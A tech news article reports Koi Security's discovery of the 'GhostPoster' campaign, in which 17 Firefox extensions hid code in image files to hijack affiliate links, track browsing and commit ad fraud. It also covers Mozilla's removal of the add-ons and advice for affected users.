- Seventeen Firefox extensions were found to contain hidden malware and backdoors
- The add ons hijacked affiliate links, tracked browsing, and enabled ad fraud
- Malicious code was concealed in image files and triggered only part of the time
- Mozilla removed the extensions and urges users to uninstall and secure accounts
Security researchers have uncovered a troubling campaign targeting Firefox users, revealing that a cluster of popular browser add ons were quietly doing far more than they claimed.
Instead of offering simple utilities like translation tools, weather updates, or VPN services, these extensions were laced with hidden backdoors, tracking systems, and ad fraud capabilities.
The discovery was made by Koi Security, which tracked the activity under the name “GhostPoster.”
According to their findings, at least 17 Firefox extensions were involved, collectively downloaded more than 50,000 times before being taken down.
What makes this case particularly concerning is how long these add ons operated unnoticed, despite being hosted on Mozilla’s official add ons store.
These were not obscure or obviously suspicious tools. Many appeared polished, offered familiar branding, and mimicked legitimate services users rely on daily. That familiarity is precisely what allowed them to spread quietly.
How the Extensions Worked Behind the Scenes
The technical approach used in this campaign shows careful planning and a strong understanding of how to evade detection. Several of the malicious extensions hid JavaScript code inside their own image files, specifically PNG logos.
To a casual review or automated scan, these files looked harmless. In reality, they contained instructions that told the extension when and how to fetch additional malicious code.
To reduce the chance of being flagged, the extensions only downloaded their main payload about 10 percent of the time. That meant many users could run the extension for weeks without noticing any obvious red flags, while still being exposed to background abuse.
Once activated, the downloaded payload could perform a wide range of actions. The most consistent behavior involved hijacking affiliate links on major e-commerce platforms.
When a user clicked a product link, the extension silently rewrote it so that commissions were redirected to the attackers instead of legitimate publishers or creators.
In addition to financial manipulation, the extensions injected Google Analytics tracking code into nearly every page the user visited.
This allowed the operators to monitor browsing behavior at scale. Even more concerning, the malware stripped security headers from HTTP responses, weakening protections that normally help guard against other attacks.
From Ad Fraud to Bigger Risks Ahead
Beyond affiliate theft and tracking, the extensions were also capable of bypassing CAPTCHA systems using multiple techniques. They injected invisible iframes into webpages, which were typically used for ad fraud, click fraud, and behavioral tracking.
These iframes were designed to self delete after about 15 seconds, further reducing the chance of detection.
While researchers did not observe widespread credential theft or banking fraud during this campaign, the infrastructure was clearly capable of supporting more damaging attacks.
Koi Security warned that the same mechanisms could easily be repurposed to harvest passwords, intercept form data, or redirect users to convincing phishing pages that mimic banks or online services.
In other words, what was seen may only represent the most profitable phase of the operation, not its full potential.
Mozilla’s Response and What Users Should Do Now
After the findings were made public, Mozilla investigated the report and confirmed the malicious behavior. All identified extensions were removed from the Firefox Add ons Marketplace.
Mozilla also stated that its automated detection systems have been updated to better identify similar techniques going forward.
While this response is welcome, it does not fully undo the damage. Any user who installed one of these extensions while it was active may have already been affected. Simply uninstalling the add on is necessary, but not always sufficient.
Users are strongly advised to review account activity, especially on ecommerce platforms, reset important passwords, and enable two factor authentication where possible. It is also a good reminder to audit browser extensions regularly and remove anything that is no longer essential.
This incident reinforces a hard truth about browser security. Even official stores are not immune to abuse, and convenience tools can sometimes come with hidden costs.
Follow TechBSB For More Updates
